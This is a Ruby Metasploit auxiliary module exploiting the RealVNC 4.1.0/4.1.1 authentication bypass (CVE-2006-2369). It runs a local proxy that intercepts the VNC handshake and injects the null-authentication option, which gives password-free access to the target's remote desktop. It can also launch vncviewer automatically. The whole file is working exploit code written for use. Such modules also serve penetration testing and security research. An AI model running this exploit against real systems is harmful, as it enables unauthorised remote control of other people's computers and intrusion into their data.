RealVNC Authentication Bypass

`##  
# $Id: realvnc_41_bypass.rb 13641 2011-08-26 04:40:21Z bannedit $  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
  
  
class Metasploit3 < Msf::Auxiliary  
include Msf::Exploit::Remote::Tcp  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'RealVNC Authentication Bypass',  
'Description' => %q{  
This module exploits an Authentication Bypass Vulnerability  
in RealVNC Server version 4.1.0 and 4.1.1. It sets up a proxy  
listener on LPORT and proxies to the target server  
  
The AUTOVNC option requires that vncviewer be installed on   
the attacking machine. This option should be disabled for Pro  
},  
'Author' =>   
[  
'hdm', #original msf2 module  
'TheLightCosine <thelightcosine[at]gmail.com>'  
],  
'License' => MSF_LICENSE,  
'Version' => '$Revision: 13641 $',  
'References' =>  
[  
['BID', '17978'],  
['OSVDB', '25479'],  
['URL', 'http://secunia.com/advisories/20107/'],  
['CVE', 'CVE-2006-2369'],  
],  
'DisclosureDate' => 'May 15 2006'))  
  
register_options(  
[  
OptAddress.new('RHOST', [true, 'The Target Host']),  
OptPort.new('RPORT', [true, "The port the target VNC Server is listening on", 5900 ]),  
OptPort.new('LPORT', [true, "The port the local VNC Proxy should listen on", 5900 ]),  
OptBool.new('AUTOVNC', [true, "Automatically Launch vncviewer from this host", true])  
], self.class)  
end  
  
def run  
#starts up the Listener Server  
print_status("starting listener")  
listener = Rex::Socket::TcpServer.create(  
'LocalHost' => '0.0.0.0',  
'LocalPort' => datastore['LPORT'],  
'Context' => { 'Msf' => framework, 'MsfExploit' => self }  
)  
  
#If the autovnc option is set to true this will spawn a vncviewer on the lcoal machine  
#targetting the proxy listener.  
if (datastore['AUTOVNC'])  
unless (check_vncviewer())  
print_error("vncviewer does not appear to be installed, exiting!!!")  
return nil  
end  
print_status("Spawning viewer thread")   
view = framework.threads.spawn("VncViewerWrapper", false) {  
system("vncviewer 127.0.0.1::#{datastore['LPORT']}")  
}  
end  
  
#Establishes the connection between the viewier and the remote server  
client = listener.accept  
add_socket(client)  
  
s = Rex::Socket::Tcp.create(  
'PeerHost' => datastore['RHOST'],  
'PeerPort' => datastore['RPORT'],  
'Timeout' => 1  
)  
add_socket(s)  
serverhello = s.gets  
unless serverhello.include? "RFB 003.008"  
print_error("The VNCServer is not vulnerable")  
return  
end  
  
#MitM attack on the VNC Authentication Process  
client.puts(serverhello)  
clienthello = client.gets  
s.puts(clienthello)  
authmethods = s.recv(2)  
print_status("Auth Methods Recieved. Sending Null Authentication Option to Client")  
client.write("\x01\x01")  
client.recv(1)  
s.write("\x01")  
s.recv(4)  
client.write("\x00\x00\x00\x00")  
  
#handles remaining proxy operations between the two sockets  
closed = false  
while(closed == false)  
sockets =[]  
sockets << client  
sockets << s  
selected = select(sockets,nil,nil,0)  
#print_status ("Selected: #{selected.inspect}")  
unless selected.nil?  
if selected[0].include?(client)  
#print_status("Transfering from client to server")  
begin  
data = client.sysread(8192)  
if data.nil?  
print_error("Client Closed Connection")  
closed = true  
else  
s.write(data)  
end  
rescue  
print_error("Client Closed Connection")   
closed = true  
end  
end  
if selected[0].include?(s)  
#print_status("Transfering from server to client")  
begin  
data = s.sysread(8192)  
if data.nil?  
print_error("Server Closed Connection")  
closed = true  
else  
client.write(data)  
end  
rescue  
closed = true  
end  
end  
end  
end  
  
#Garbage Collection  
s.close  
client.close  
print_status("Listener Closed")  
  
if (datastore['AUTOVNC'])  
view.kill  
print_status("Viewer Closed")  
end  
end  
  
def check_vncviewer  
vnc =  
Rex::FileUtils::find_full_path('vncviewer') ||  
Rex::FileUtils::find_full_path('vncviewer.exe')  
if (vnc)  
return true  
else  
return false  
end  
end  
end  
`